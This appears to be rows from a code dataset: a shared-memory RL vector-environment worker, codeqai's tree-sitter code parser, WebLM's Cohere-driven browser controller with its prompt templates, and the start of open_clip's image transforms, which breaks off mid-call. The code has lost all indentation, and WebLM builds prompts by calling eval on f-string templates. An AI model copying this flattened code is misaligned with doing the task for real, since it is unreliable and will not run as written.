with clear_mpi_env_vars():
for env_fn, obs_buf in zip(env_fns, self.obs_bufs):
wrapped_fn = CloudpickleWrapper(env_fn)
parent_pipe, child_pipe = ctx.Pipe()
proc = ctx.Process(target=_subproc_worker,
args=(child_pipe, parent_pipe, wrapped_fn, obs_buf, self.obs_shapes, self.obs_dtypes, self.obs_keys))
proc.daemon = True
self.procs.append(proc)
self.parent_pipes.append(parent_pipe)
proc.start()
child_pipe.close()
self.waiting_step = False
self.viewer = None
def reset(self):
if self.waiting_step:
self.step_wait()
for pipe in self.parent_pipes:
pipe.send(('reset', None))
return self._decode_obses([pipe.recv() for pipe in self.parent_pipes])
def step_async(self, actions):
assert len(actions) == len(self.parent_pipes)
for pipe, act in zip(self.parent_pipes, actions):
pipe.send(('step', act))
def step_wait(self):
outs = [pipe.recv() for pipe in self.parent_pipes]
obs, rews, dones, infos = zip(*outs)
return self._decode_obses(obs), np.array(rews), np.array(dones), infos
def close_extras(self):
if self.waiting_step:
self.step_wait()
for pipe in self.parent_pipes:
pipe.send(('close', None))
for pipe in self.parent_pipes:
pipe.recv()
pipe.close()
for proc in self.procs:
proc.join()
def get_images(self, mode='human'):
for pipe in self.parent_pipes:
pipe.send(('render', None))
return [pipe.recv() for pipe in self.parent_pipes]
def _decode_obses(self, obs):
result = {}
for k in self.obs_keys:
bufs = [b[k] for b in self.obs_bufs]
o = [np.frombuffer(b.get_obj(), dtype=self.obs_dtypes[k]).reshape(self.obs_shapes[k]) for b in bufs]
result[k] = np.array(o)
return dict_to_obs(result)
def _subproc_worker(pipe, parent_pipe, env_fn_wrapper, obs_bufs, obs_shapes, obs_dtypes, keys):
"""
Control a single environment instance using IPC and
shared memory.
"""
def _write_obs(maybe_dict_obs):
flatdict = obs_to_dict(maybe_dict_obs)
for k in keys:
dst = obs_bufs[k].get_obj()
dst_np = np.frombuffer(dst, dtype=obs_dtypes[k]).reshape(obs_shapes[k]) # pylint: disable=W0212
np.copyto(dst_np, flatdict[k])
env = env_fn_wrapper.x()
parent_pipe.close()
try:
while True:
cmd, data = pipe.recv()
if cmd == 'reset':
pipe.send(_write_obs(env.reset()))
elif cmd == 'step':
obs, reward, done, info = env.step(data)
if done:
obs = env.reset()
pipe.send((_write_obs(obs), reward, done, info))
elif cmd == 'render':
pipe.send(env.render(mode='rgb_array'))
elif cmd == 'close':
pipe.send(None)
break
else:
raise RuntimeError('Got unrecognized cmd %s' % cmd)
except KeyboardInterrupt:
print('ShmemVecEnv worker: got KeyboardInterrupt')
finally:
env.close()
| [] |
2024-01-10 | fynnfluegge/codeqai | codeqai~codeparser.py | import os
from langchain.schema import Document
from langchain.text_splitter import RecursiveCharacterTextSplitter
from codeqai import repo, utils
from codeqai.constants import Language
from codeqai.treesitter.treesitter import Treesitter, TreesitterMethodNode
def parse_code_files(code_files: list[str]) -> list[Document]:
documents = []
code_splitter = None
for code_file in code_files:
with open(code_file, "r") as file:
file_bytes = file.read().encode()
commit_hash = repo.get_commit_hash(code_file)
file_extension = utils.get_file_extension(code_file)
programming_language = utils.get_programming_language(file_extension)
if programming_language == Language.UNKNOWN:
continue
langchain_language = utils.get_langchain_language(programming_language)
if langchain_language:
code_splitter = RecursiveCharacterTextSplitter.from_language(
language=langchain_language,
chunk_size=512,
chunk_overlap=128,
)
treesitter_parser = Treesitter.create_treesitter(programming_language)
treesitterNodes: list[TreesitterMethodNode] = treesitter_parser.parse(
file_bytes
)
for node in treesitterNodes:
method_source_code = node.method_source_code
filename = os.path.basename(code_file)
if node.doc_comment and programming_language != Language.PYTHON:
method_source_code = node.doc_comment + "\n" + method_source_code
splitted_documents = [method_source_code]
if code_splitter:
splitted_documents = code_splitter.split_text(method_source_code)
for splitted_document in splitted_documents:
document = Document(
page_content=splitted_document,
metadata={
"filename": filename,
"method_name": node.name,
"commit_hash": commit_hash,
},
)
documents.append(document)
return documents
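# Usage sketch (path is illustrative): parse_code_files(["src/example.py"]) returns one
# langchain Document per (possibly split) method found by the tree-sitter parser.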
| [] |
2024-01-10 | russelnelson/weblm | weblm~controller.py | import csv
import heapq
import itertools
import json
import math
import os
import re
from collections import defaultdict
from concurrent.futures import ThreadPoolExecutor
from enum import Enum
from typing import Any, DefaultDict, Dict, List, Tuple, Union
import cohere
import numpy as np
from requests.exceptions import ConnectionError
MAX_SEQ_LEN = 2000
MAX_NUM_ELEMENTS = 50
TYPEABLE = ["input", "select"]
CLICKABLE = ["link", "button"]
MODEL = "xlarge"
help_msg = """Welcome to WebLM!
The goal of this project is to build a system that takes an objective from the user, and operates a browser to carry it out.
For example:
- book me a table for 2 at bar isabel next wednesday at 7pm
- i need a flight from SF to London on Oct 15th nonstop
- buy me more whitening toothpaste from amazon and send it to my apartment
WebLM learns to carry out tasks *by demonstration*. That means that you'll need to guide it and correct it when it goes astray. Over time, the more people who use it, the more tasks it's used for, WebLM will become better and better and rely less and less on user input.
To control the system:
- You can see what the model sees at each step by looking at the list of elements the model can interact with
- show: You can also see a picture of the browser window by typing `show`
- goto: You can go to a specific webpage by typing `goto www.yourwebpage.com`
- success: When the model has succeeded at the task you set out (or gotten close enough), you can teach the model by typing `success` and it will save its actions to use in future iterations
- cancel: If the model is failing or you made a catastrophic mistake you can type `cancel` to kill the session
- help: Type `help` to show this message
Every time you use WebLM it will improve. If you want to contribute to the project and help us build it, join the discord (https://discord.com/invite/co-mmunity) or send an email to [email protected]"""
prompt_template = """Given:
(1) an objective that you are trying to achieve
(2) the URL of your current web page
(3) a simplified text description of what's visible in the browser window
Your commands are:
click X - click on element X.
type X "TEXT" - type the specified text into input X
Here are some examples:
$examples
Present state:
$state
Next Command:"""
state_template = """Objective: $objective
Current URL: $url
Current Browser Content:
------------------
$browser_content
------------------
Previous actions:
$previous_commands"""
prioritization_template = """$examples
---
Here are the most relevant elements on the webpage (links, buttons, selects and inputs) to achieve the objective below:
Objective: $objective
URL: $url
Relevant elements:
{element}"""
priorit_tmp = ("Objective: {objective}"
"\nURL: {url}"
"\nRelevant elements:"
"\n{elements}")
user_prompt_end = ("\n\t(success) the goal is accomplished"
"\n\t(cancel) terminate the session"
"\nType a choice and then press enter:")
user_prompt_1 = ("Given web state:\n{state}"
"\n\nI have to choose between `clicking` and `typing` here."
"\n**I think I should{action}**"
"\n\t(y) proceed with this action"
"\n\t(n) do the other action" + user_prompt_end)
user_prompt_2 = ("Given state:\n{self._construct_state(self.objective, url, pruned_elements, self.previous_commands)}"
"\n\nSuggested command: {cmd}.\n\t(y) accept and continue"
"\n\t(s) save example, accept, and continue"
"\n{other_options}"
"\n\t(back) choose a different action"
"\n\t(enter a new command) type your own command to replace the model's suggestion" + user_prompt_end)
user_prompt_3 = ("Given state:\n{self._construct_state(self.objective, url, pruned_elements, self.previous_commands)}"
"\n\nSuggested command: {self._cmd}.\n\t(y) accept and continue"
"\n\t(s) save example, accept, and continue"
"\n\t(back) choose a different action"
"\n\t(enter a new command) type your own command to replace the model's suggestion" + user_prompt_end)
def _fn(x):
if len(x) == 3:
option, prompt, self = x
return_likelihoods = "ALL"
elif len(x) == 4:
option, prompt, self, return_likelihoods = x
while True:
try:
if len(self.co.tokenize(prompt)) > 2048:
prompt = truncate_left(self.co.tokenize, prompt)
return (self.co.generate(prompt=prompt, max_tokens=0, model=MODEL,
return_likelihoods=return_likelihoods).generations[0].likelihood, option)
except cohere.error.CohereError as e:
print(f"Cohere fucked up: {e}")
continue
except ConnectionError as e:
print(f"Connection error: {e}")
continue
def truncate_left(tokenize, prompt, *rest_of_prompt, limit=2048):
i = 0
chop_size = 5
print(f"WARNING: truncating sequence of length {len(tokenize(prompt + ''.join(rest_of_prompt)))} to length {limit}")
while len(tokenize(prompt + "".join(rest_of_prompt))) > limit:
prompt = prompt[i * chop_size:]
i += 1
return prompt
def split_list_by_separators(l: List[Any], separator_sequences: List[List[Any]]) -> List[List[Any]]:
"""Split a list by a subsequence.
split_list_by_separators(range(7), [[2, 3], [5]]) == [[0, 1], [4], [6]]
"""
split_list: List[List[Any]] = []
tmp_seq: List[Any] = []
i = 0
while i < len(l):
item = l[i]
# if this item may be part of one of the separator_sequences
if any(item == x[0] for x in separator_sequences):
for s in filter(lambda x: item == x[0], separator_sequences):
# if we've found a matching subsequence
if l[i:i + len(s)] == s:
if len(tmp_seq) != 0:
split_list.append(tmp_seq)
tmp_seq = []
i += len(s)
break
else:
i += 1
else:
tmp_seq.append(item)
i += 1
if len(tmp_seq) != 0:
split_list.append(tmp_seq)
return split_list
def search(co: cohere.Client, query: str, items: List[str], topk: int) -> List[str]:
embedded_items = np.array(co.embed(texts=items, truncate="RIGHT").embeddings)
embedded_query = np.array(co.embed(texts=[query], truncate="RIGHT").embeddings[0])
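# The scores below are cosine similarities between the query embedding and each item
# embedding: scores[j] = <q, e_j> / (||q|| * ||e_j||); argsort then keeps the topk items.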
scores = np.einsum("i,ji->j", embedded_query,
embedded_items) / (np.linalg.norm(embedded_query) * np.linalg.norm(embedded_items, axis=1))
ind = np.argsort(scores)[-topk:]
return np.flip(np.array(items)[ind], axis=0)
class Prompt:
def __init__(self, prompt: str) -> None:
self.prompt = prompt
def __str__(self) -> str:
return self.prompt
class Command:
def __init__(self, cmd: str) -> None:
self.cmd = cmd
def __str__(self) -> str:
return self.cmd
class DialogueState(Enum):
Unset = None
Action = "pick action"
ActionFeedback = "action from feedback"
Command = "suggest command"
CommandFeedback = "command from feedback"
class Controller:
"""A Cohere-powered controller that takes in a browser state and produces and action.
The basic outline of this Controller's strategy is:
1. receive page content from browser
2. prioritise elements on page based on how relevant they are to the objective
3. look up similar states from the past
4. choose between clicking and typing
5. choose what element to click or what element to type in
"""
def __init__(self, co: cohere.Client, objective: str):
"""
Args:
co (cohere.Client): a Cohere Client
objective (str): the objective to accomplish
"""
self.co = co
self.objective = objective
self.previous_commands: List[str] = []
self.moments: List[Tuple[str, str, str, List[str]]] = []
self.user_responses: DefaultDict[str, int] = defaultdict(int)
self.reset_state()
def is_running(self):
return self._step != DialogueState.Unset
def reset_state(self):
self._step = DialogueState.Unset
self._action = None
self._cmd = None
self._chosen_elements: List[Dict[str, str]] = []
self._prioritized_elements = None
self._pruned_prioritized_elements = None
self._prioritized_elements_hash = None
self._page_elements = None
self._error = None
def success(self):
for url, elements, command, previous_commands in self.moments:
self._save_example(objective=self.objective,
url=url,
elements=elements,
command=command,
previous_commands=previous_commands)
def choose(self,
template: str,
options: List[Dict[str, str]],
return_likelihoods: str = "ALL",
topk: int = 1) -> List[Tuple[int, Dict[str, str]]]:
"""Choose the most likely continuation of `prompt` from a set of `options`.
Args:
template (str): a string template with keys that match the dictionaries in `options`
options (List[Dict[str, str]]): the options to be chosen from
Returns:
str: the most likely option from `options`
"""
num_options = len(options)
with ThreadPoolExecutor(num_options) as pp:
_lh = pp.map(
_fn,
zip(options, [template.format(**option) for option in options], [self] * num_options,
[return_likelihoods] * num_options))
return sorted(_lh, key=lambda x: x[0], reverse=True)[:topk]
def choose_element(self,
template: str,
options: List[Dict[str, str]],
group_size: int = 10,
topk: int = 1) -> List[Dict[str, str]]:
"""A hacky way of choosing the most likely option, while staying within sequence length constraints
Algo:
1. chunk `options` into groups of `group_size`
2. within each group perform a self.choose to get the topk elements (we'll have num_groups*topk elements after this)
3. flatten and repeat recursively until the number of options is down to topk
Args:
template (str): the prompt template with f-string style template tags
options (List[Dict[str, str]]): a list of dictionaries containing key-value replacements of the template tags
group_size (int, optional): The size of each group of options to select from. Defaults to 10.
topk (int, optional): The topk most likely options to return. Defaults to 1.
Returns:
List[Dict[str, str]]: The `topk` most likely elements in `options` according to the model
"""
num_options = len(options)
num_groups = int(math.ceil(num_options / group_size))
if num_options == 0:
raise Exception()
choices = []
for i in range(num_groups):
group = options[i * group_size:(i + 1) * group_size]
template_tmp = template.replace("elements", "\n".join(item["elements"] for item in group))
options_tmp = [{"id": item["id"]} for item in group]
choice = [x[1] for x in self.choose(template_tmp, options_tmp, topk=topk)]
chosen_elements = []
for x in choice:
chosen_elements.append(list(filter(lambda y: y["id"] == x["id"], group))[0])
choices.extend(chosen_elements)
if len(choices) <= topk:
return choices
else:
return self.choose_element(template, choices, group_size, topk)
def gather_examples(self, state: str, topk: int = 5) -> List[str]:
"""Simple semantic search over a file of past interactions to find the most similar ones."""
with open("examples.json", "r") as fd:
history = json.load(fd)
if len(history) == 0:
return []
embeds = [h["embedding"] for h in history]
examples = [h["example"] for h in history]
embeds = np.array(embeds)
embedded_state = np.array(self.co.embed(texts=[state], truncate="RIGHT").embeddings[0])
scores = np.einsum("i,ji->j", embedded_state,
embeds) / (np.linalg.norm(embedded_state) * np.linalg.norm(embeds, axis=1))
ind = np.argsort(scores)[-topk:]
examples = np.array(examples)[ind]
states = []
for i in ind:
h = history[int(i)]
if all(x in h for x in ["objective", "url", "elements", "previous_commands"]):
states.append(
self._construct_state(objective=h["objective"],
url=h["url"],
page_elements=h["elements"],
previous_commands=h["previous_commands"]))
else:
states.append(h["example"])
return states
def gather_prioritisation_examples(self, state: str, topk: int = 6, num_elements: int = 3) -> List[str]:
"""Simple semantic search over a file of past interactions to find the most similar ones."""
with open("examples.json", "r") as fd:
history = json.load(fd)
if len(history) == 0:
return []
embeds = [h["embedding"] for h in history]
examples = [h["example"] for h in history]
embeds = np.array(embeds)
embedded_state = np.array(self.co.embed(texts=[state], truncate="RIGHT").embeddings[0])
scores = np.einsum("i,ji->j", embedded_state,
embeds) / (np.linalg.norm(embedded_state) * np.linalg.norm(embeds, axis=1))
ind = np.argsort(scores)[-topk:]
examples = np.array(examples)[ind]
prioritisation_examples = []
for i, h in enumerate(history):
if i in ind:
if all(x in h for x in ["objective", "command", "url", "elements"]):
# make sure the element relevant to the next command is included
elements = h["elements"]
command_element = " ".join(h["command"].split()[1:3])
command_element = list(filter(lambda x: command_element in x, elements))
assert len(command_element) == 1
command_element = command_element[0]
if not command_element in elements[:num_elements]:
elements = [command_element] + elements[:-1]
elements = elements[:num_elements]
objective = h["objective"]
url = h["url"]
elements = '\n'.join(elements)
prioritisation_example = eval(f'f"""{priorit_tmp}"""')
prioritisation_examples.append(prioritisation_example)
return prioritisation_examples
def _construct_prev_cmds(self, previous_commands: List[str]) -> str:
return "\n".join(f"{i+1}. {x}" for i, x in enumerate(previous_commands)) if previous_commands else "None"
def _construct_state(self, objective: str, url: str, page_elements: List[str], previous_commands: List[str]) -> str:
state = state_template
state = state.replace("$objective", objective)
state = state.replace("$url", url[:100])
state = state.replace("$previous_commands", self._construct_prev_cmds(previous_commands))
return state.replace("$browser_content", "\n".join(page_elements))
def _construct_prompt(self, state: str, examples: List[str]) -> str:
prompt = prompt_template
prompt = prompt.replace("$examples", "\n\n".join(examples))
return prompt.replace("$state", state)
def _save_example(self, objective: str, url: str, elements: List[str], command: str, previous_commands: List[str]):
state = self._construct_state(objective, url, elements[:MAX_NUM_ELEMENTS], previous_commands)
example = ("Example:\n"
f"{state}\n"
f"Next Command: {command}\n"
"----")
print(f"Example being saved:\n{example}")
with open("examples.json", "r") as fd:
history = json.load(fd)
examples = [h["example"] for h in history]
if example in examples:
print("example already exists")
return
history.append({
"example": example,
"embedding": self.co.embed(texts=[example]).embeddings[0],
"url": url,
"elements": elements,
"command": command,
"previous_commands": previous_commands,
"objective": objective,
})
with open("examples_tmp.json", "w") as fd:
json.dump(history, fd)
os.replace("examples_tmp.json", "examples.json")
def _construct_responses(self):
keys_to_save = ["y", "n", "s", "command", "success", "cancel"]
responses_to_save = defaultdict(int)
for key, value in self.user_responses.items():
if key in keys_to_save:
responses_to_save[key] = value
elif key not in keys_to_save and key:
responses_to_save["command"] += 1
self.user_responses = responses_to_save
print(f"Responses being saved:\n{dict(responses_to_save)}")
def save_responses(self):
keys_to_save = ["y", "n", "s", "command", "success", "cancel"]
# Check if data file already exists
responses_filepath = "responses.csv"
if os.path.isfile(responses_filepath):
print("File exists")
with open(responses_filepath, "a+") as fd:
wr = csv.writer(fd, quoting=csv.QUOTE_ALL)
wr.writerow([self.user_responses[key] for key in keys_to_save])
else:
print("No data available")
with open(responses_filepath, "w+") as fd:
wr = csv.writer(fd, quoting=csv.QUOTE_ALL)
wr.writerow(keys_to_save)
wr.writerow([self.user_responses[key] for key in keys_to_save])
def _shorten_prompt(self,
objective: str,
url: str,
elements: List[str],
previous_commands: List[str],
examples: List[str],
*rest_of_prompt,
target: int = MAX_SEQ_LEN):
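# Shortening strategy: drop retrieved examples first (least-similar ones go first, down to
# MIN_EXAMPLES), then drop the lowest-priority page elements (down to MIN_ELEMENTS), and as
# a last resort truncate the prompt from the left until it fits in `target` tokens.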
state = self._construct_state(objective, url, elements, previous_commands)
prompt = self._construct_prompt(state, examples)
tokenized_prompt = self.co.tokenize(prompt + "".join(rest_of_prompt))
tokens = tokenized_prompt.token_strings
split_tokens = split_list_by_separators(tokens,
[['EX', 'AMP', 'LE'], ["Example"], ["Present", " state", ":", "\n"]])
example_tokens = split_tokens[1:-1]
length_of_examples = list(map(len, example_tokens))
state_tokens = split_tokens[-1]
state_tokens = list(
itertools.chain.from_iterable(
split_list_by_separators(state_tokens, [['----', '----', '----', '----', '--', '\n']])[1:-1]))
state_tokens = split_list_by_separators(state_tokens, [["\n"]])
length_of_elements = list(map(len, state_tokens))
length_of_prompt = len(tokenized_prompt)
def _fn(i, j):
state = self._construct_state(objective, url, elements[:len(elements) - i], previous_commands)
prompt = self._construct_prompt(state, examples[j:])
return state, prompt
MIN_EXAMPLES = 1
i, j = (0, 0)
while (length_of_prompt - sum(length_of_examples)) + sum(
length_of_examples[j:]) > target and j < len(examples) - MIN_EXAMPLES:
j += 1
print(f"num examples: {len(examples) - j}")
state, prompt = _fn(i, j)
if len(self.co.tokenize(prompt + "".join(rest_of_prompt))) <= target:
return state, prompt
MIN_ELEMENTS = 7
while (length_of_prompt - sum(length_of_examples[:j]) - sum(length_of_elements)) + sum(
length_of_elements[:len(length_of_elements) - i]) > target and i < len(elements) - MIN_ELEMENTS:
i += 1
print(f"num elements: {len(length_of_elements) - i}")
state, prompt = _fn(i, j)
# last resort: start cutting off the beginning of the prompt
if len(self.co.tokenize(prompt + "".join(rest_of_prompt))) > target:
prompt = truncate_left(self.co.tokenize, prompt, *rest_of_prompt, limit=target)
return state, prompt
def _generate_prioritization(self, page_elements: List[str], url: str):
state = self._construct_state(self.objective, url, page_elements, self.previous_commands)
examples = self.gather_prioritisation_examples(state)
prioritization = prioritization_template
prioritization = prioritization.replace("$examples", "\n---\n".join(examples))
prioritization = prioritization.replace("$objective", self.objective)
prioritization = prioritization.replace("$url", url)
self._prioritized_elements = self.choose(prioritization, [{
"element": x
} for x in page_elements],
topk=len(page_elements))
self._prioritized_elements = [x[1]["element"] for x in self._prioritized_elements]
self._prioritized_elements_hash = hash(frozenset(page_elements))
self._pruned_prioritized_elements = self._prioritized_elements[:MAX_NUM_ELEMENTS]
self._step = DialogueState.Action
print(self._prioritized_elements)
def pick_action(self, url: str, page_elements: List[str], response: str = None):
# this strategy for action selection does not work very well, TODO improve this
if self._step not in [DialogueState.Action, DialogueState.ActionFeedback]:
return
state = self._construct_state(self.objective, url, self._pruned_prioritized_elements, self.previous_commands)
examples = self.gather_examples(state)
prompt = self._construct_prompt(state, examples)
if self._step == DialogueState.Action:
action = " click"
if any(y in x for y in TYPEABLE for x in page_elements):
elements = list(
filter(lambda x: any(x.startswith(y) for y in CLICKABLE + TYPEABLE),
self._pruned_prioritized_elements))
state, prompt = self._shorten_prompt(self.objective,
url,
elements,
self.previous_commands,
examples,
target=MAX_SEQ_LEN)
action = self.choose(prompt + "{action}", [
{
"action": " click",
},
{
"action": " type",
},
], topk=2)
# if the model is confident enough, just assume the suggested action is correct
if (action[0][0] - action[1][0]) / -action[1][0] > 1.:
action = action[0][1]["action"]
else:
action = action[0][1]["action"]
self._action = action
self._step = DialogueState.ActionFeedback
return Prompt(eval(f'f"""{user_prompt_1}"""'))
self._action = action
self._step = DialogueState.Command
elif self._step == DialogueState.ActionFeedback:
if response == "y":
pass
elif response == "n":
if "click" in self._action:
self._action = " type"
elif "type" in self._action:
self._action = " click"
elif response == "examples":
examples = "\n".join(examples)
return Prompt(f"Examples:\n{examples}\n\n"
"Please respond with 'y' or 'n'")
elif re.match(r'search (.+)', response):
query = re.match(r'search (.+)', response).group(1)
results = search(self.co, query, self._page_elements, topk=50)
return Prompt(f"Query: {query}\nResults:\n{results}\n\n"
"Please respond with 'y' or 'n'")
else:
return Prompt("Please respond with 'y' or 'n'")
self._step = DialogueState.Command
def _get_cmd_prediction(self, prompt: str, chosen_element: str) -> str:
if "type" in self._action:
text = None
while text is None:
try:
num_tokens = 20
if len(self.co.tokenize(prompt)) > 2048 - num_tokens:
print(f"WARNING: truncating sequence of length {len(self.co.tokenize(prompt))}")
prompt = truncate_left(self.co.tokenize,
prompt,
self._action,
chosen_element,
limit=2048 - num_tokens)
print(len(self.co.tokenize(prompt + self._action + chosen_element)))
text = max(self.co.generate(prompt=prompt + self._action + chosen_element,
model=MODEL,
temperature=0.5,
num_generations=5,
max_tokens=num_tokens,
stop_sequences=["\n"],
return_likelihoods="GENERATION").generations,
key=lambda x: x.likelihood).text
except cohere.error.CohereError as e:
print(f"Cohere fucked up: {e}")
continue
else:
text = ""
return (self._action + chosen_element + text).strip()
def generate_command(self, url: str, pruned_elements: List[str], response: str = None):
state = self._construct_state(self.objective, url, pruned_elements, self.previous_commands)
examples = self.gather_examples(state)
prompt = self._construct_prompt(state, examples)
if self._step == DialogueState.Command:
if len(pruned_elements) == 1:
chosen_element = " " + " ".join(pruned_elements[0].split(" ")[:2])
self._chosen_elements = [{"id": chosen_element}]
else:
state = self._construct_state(self.objective, url, ["$elements"], self.previous_commands)
prompt = self._construct_prompt(state, examples)
state, prompt = self._shorten_prompt(self.objective, url, ["$elements"], self.previous_commands,
examples, self._action)
group_size = 20
self._chosen_elements = self.choose_element(
prompt + self._action + "{id}",
list(map(lambda x: {
"id": " " + " ".join(x.split(" ")[:2]),
"elements": x
}, pruned_elements)),
group_size,
topk=5)
chosen_element = self._chosen_elements[0]["id"]
state = self._construct_state(self.objective, url, pruned_elements, self.previous_commands)
prompt = self._construct_prompt(state, examples)
state, prompt = self._shorten_prompt(self.objective, url, pruned_elements, self.previous_commands,
examples, self._action, chosen_element)
cmd = self._get_cmd_prediction(prompt, chosen_element)
self._cmd = cmd
self._step = DialogueState.CommandFeedback
other_options = "\n".join(
f"\t({i+2}){self._action}{x['id']}" for i, x in enumerate(self._chosen_elements[1:]))
return Prompt(eval(f'f"""{user_prompt_2}"""'))
elif self._step == DialogueState.CommandFeedback:
if response == "examples":
examples = "\n".join(examples)
return Prompt(f"Examples:\n{examples}\n\n"
"Please respond with 'y' or 's'")
elif response == "prompt":
chosen_element = self._chosen_elements[0]["id"]
state, prompt = self._shorten_prompt(self.objective, url, pruned_elements, self.previous_commands,
examples, self._action, chosen_element)
return Prompt(f"{prompt}\n\nPlease respond with 'y' or 's'")
elif response == "recrawl":
return Prompt(eval(f'f"""{user_prompt_3}"""'))
elif response == "elements":
return Prompt("\n".join(str(d) for d in self._chosen_elements))
elif re.match(r'search (.+)', response):
query = re.match(r'search (.+)', response).group(1)
results = search(self.co, query, self._page_elements, topk=50)
return Prompt(f"Query: {query}\nResults:\n{results}\n\n"
"Please respond with 'y' or 'n'")
if re.match(r'\d+', response):
chosen_element = self._chosen_elements[int(response) - 1]["id"]
state, prompt = self._shorten_prompt(self.objective, url, pruned_elements, self.previous_commands,
examples, self._action, chosen_element)
self._cmd = self._get_cmd_prediction(prompt, chosen_element)
if "type" in self._action:
return Prompt(eval(f'f"""{user_prompt_3}"""'))
elif response != "y" and response != "s":
self._cmd = response
cmd_pattern = r"(click|type) (link|button|input|select) [\d]+( \"\w+\")?"
if not re.match(cmd_pattern, self._cmd):
return Prompt(f"Invalid command '{self._cmd}'. Must match regex '{cmd_pattern}'. Try again...")
if response == "s":
self._save_example(objective=self.objective,
url=url,
elements=self._prioritized_elements,
command=self._cmd,
previous_commands=self.previous_commands)
self.moments.append((url, self._prioritized_elements, self._cmd, self.previous_commands.copy()))
self.previous_commands.append(self._cmd)
cmd = Command(self._cmd.strip())
self.reset_state()
return cmd
def step(self, url: str, page_elements: List[str], response: str = None) -> Union[Prompt, Command]:
if self._error is not None:
if response == "c":
self._error = None
elif response == "success":
self.success()
raise self._error from None
elif response == "cancel":
raise self._error from None
else:
return Prompt("Response not recognized"
"\nPlease choose one of the following:"
"\n\t(c) ignore exception and continue" + user_prompt_end)
try:
self._step = DialogueState.Action if self._step == DialogueState.Unset else self._step
self._page_elements = page_elements
if self._prioritized_elements is None or self._prioritized_elements_hash != hash(frozenset(page_elements)):
self._generate_prioritization(page_elements, url)
self.user_responses[response] += 1
self._construct_responses()
action_or_prompt = self.pick_action(url, page_elements, response)
if isinstance(action_or_prompt, Prompt):
return action_or_prompt
if "click" in self._action:
pruned_elements = list(
filter(lambda x: any(x.startswith(y) for y in CLICKABLE), self._pruned_prioritized_elements))
elif "type" in self._action:
pruned_elements = list(
filter(lambda x: any(x.startswith(y) for y in TYPEABLE), self._pruned_prioritized_elements))
return self.generate_command(url, pruned_elements, response)
except Exception as e:
self._error = e
return Prompt(f"Caught exception:\n{e}"
"\nPlease choose one of the following:"
"\n\t(c) ignore exception and continue" + user_prompt_end)
| [
"\n\n",
"\n",
"1",
"Objective: $objective\nCurrent URL: $url\nCurrent Browser Content:\n------------------\n$browser_content\n------------------\nPrevious actions:\n$previous_commands",
"$examples\n---\nHere are the most relevant elements on the webpage (links, buttons, selects and inputs) to achieve the objective below:\nObjective: $objective\nURL: $url\nRelevant elements:\n{element}",
"elements",
"Given state:\n{self._construct_state(self.objective, url, pruned_elements, self.previous_commands)}\n\nSuggested command: {self._cmd}.\n\t(y) accept and continue\n\t(s) save example, accept, and continue\n\t(back) choose a different action\n\t(enter a new command) type your own command to replace the model's suggestionPLACEHOLDER",
"Given web state:\n{state}\n\nI have to choose between `clicking` and `typing` here.\n**I think I should{action}**\n\t(y) proceed with this action\n\t(n) do the other actionPLACEHOLDER",
"Given:\n (1) an objective that you are trying to achieve\n (2) the URL of your current web page\n (3) a simplified text description of what's visible in the browser window\n\nYour commands are:\n click X - click on element X.\n type X \"TEXT\" - type the specified text into input X\n\nHere are some examples:\n\n$examples\n\nPresent state:\n$state\nNext Command:",
"\n\t(success) the goal is accomplished\n\t(cancel) terminate the session\nType a choice and then press enter:",
"Given state:\n{self._construct_state(self.objective, url, pruned_elements, self.previous_commands)}\n\nSuggested command: {cmd}.\n\t(y) accept and continue\n\t(s) save example, accept, and continue\n{other_options}\n\t(back) choose a different action\n\t(enter a new command) type your own command to replace the model's suggestionPLACEHOLDER"
] |
2024-01-10 | wusize/CLIPSelf | src~open_clip~transform.py | import warnings
from dataclasses import dataclass, asdict
from typing import Any, Dict, Optional, Sequence, Tuple, Union
import torch
import torch.nn as nn
import torchvision.transforms.functional as F
from torchvision.transforms import Normalize, Compose, RandomResizedCrop, InterpolationMode, ToTensor, Resize, \
CenterCrop
from .constants import OPENAI_DATASET_MEAN, OPENAI_DATASET_STD
@dataclass
class AugmentationCfg:
scale: Tuple[float, float] = (0.9, 1.0)
ratio: Optional[Tuple[float, float]] = None
color_jitter: Optional[Union[float, Tuple[float, float, float]]] = None
interpolation: Optional[str] = None
re_prob: Optional[float] = None
re_count: Optional[int] = None
use_timm: bool = False
class ResizeMaxSize(nn.Module):
def __init__(self, max_size, interpolation=InterpolationMode.BICUBIC, fn='max', fill=0):
super().__init__()
if not isinstance(max_size, int):
raise TypeError(f"Size should be int. Got {type(max_size)}")
self.max_size = max_size
self.interpolation = interpolation
self.fn = min if fn == 'min' else max
self.fill = fill
def forward(self, img):
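# Resize so the longer side equals max_size (preserving aspect ratio), then pad
# symmetrically with `fill` so the output is exactly max_size x max_size.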
if isinstance(img, torch.Tensor):
height, width = img.shape[:2]
else:
width, height = img.size
scale = self.max_size / float(max(height, width))
new_size = tuple(round(dim * scale) for dim in (height, width))
img = F.resize(img, new_size, self.interpolation)
pad_h = self.max_size - new_size[0]
pad_w = self.max_size - new_size[1]
img = F.pad(img, padding=[pad_w // 2, pad_h // 2, pad_w - pad_w // 2, pad_h - pad_h // 2], fill=self.fill)
return img
def _convert_to_rgb(image):
return image.convert('RGB')
def image_transform(
image_size: int,
is_train: bool,
mean: Optional[Tuple[float, ...]] = None,
std: Optional[Tuple[float, ...]] = None,
resize_longest_max: bool = False,
fill_color: int = 0,
aug_cfg: Optional[Union[Dict[str, Any], AugmentationCfg]] = None,
):
mean = mean or OPENAI_DATASET_MEAN
if not isinstance(mean, (list, tuple)):
mean = (mean,) * 3
std = std or OPENAI_DATASET_STD
if not isinstance(std, (list, tuple)):
std = (std,) * 3
if isinstance(image_size, (list, tuple)) and image_size[0] == image_size[1]:
# for square size, pass size as int so that Resize() uses aspect preserving shortest edge
image_size = image_size[0]
if isinstance(aug_cfg, dict):
aug_cfg = AugmentationCfg(**aug_cfg)
else:
aug_cfg = aug_cfg or AugmentationCfg()
normalize = Normalize(mean=mean, std=std)
if is_train:
aug_cfg_dict = {k: v for k, v in asdict(aug_cfg).items() if v is not None}
use_timm = aug_cfg_dict.pop('use_timm', False)
if use_timm:
from timm.data import create_transform # timm can still be optional
if isinstance(image_size, (tuple, list)):
assert len(image_size) >= 2
input_size = (3,) + image_size[-2:]
else:
input_size = (3, image_size, image_size)
# by default, timm aug randomly alternates bicubic & bilinear for better robustness at inference time
aug_cfg_dict.setdefault('interpolation', 'random')
aug_cfg_dict.setdefault('color_jitter', None) # disable by default
train_transform = create_transform(
input_size=input_size,
is_training=True,
hflip=0.,
mean=mean,
std=std,
re_mode='pixel',
**aug_cfg_dict,
)
else:
train_transform = Compose([
RandomResizedCrop(
image_size,
